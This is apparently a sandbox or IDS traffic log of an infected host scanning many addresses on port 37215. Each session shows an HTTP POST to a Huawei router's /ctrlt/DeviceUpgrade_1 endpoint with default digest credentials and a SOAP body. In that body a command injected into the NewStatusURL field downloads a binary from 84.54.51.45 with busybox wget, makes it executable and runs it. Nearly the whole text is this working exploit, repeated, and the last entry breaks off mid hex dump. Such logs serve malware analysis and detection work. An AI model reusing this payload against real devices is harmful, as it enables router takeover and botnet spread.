                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2144192.168.2.154930841.10.35.12737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670454025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2145192.168.2.154917641.23.226.337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670460939 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2146192.168.2.155186441.73.90.8637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670499086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2147192.168.2.154267241.132.94.5837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670500040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2148192.168.2.154784241.94.13.12637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670526981 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2149192.168.2.154312641.130.223.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670526981 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2150192.168.2.154800441.90.9.10937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670553923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2151192.168.2.155831241.56.66.19637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670572042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2152192.168.2.153318841.53.142.5537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670574903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2153192.168.2.154709641.198.244.7837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670583010 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 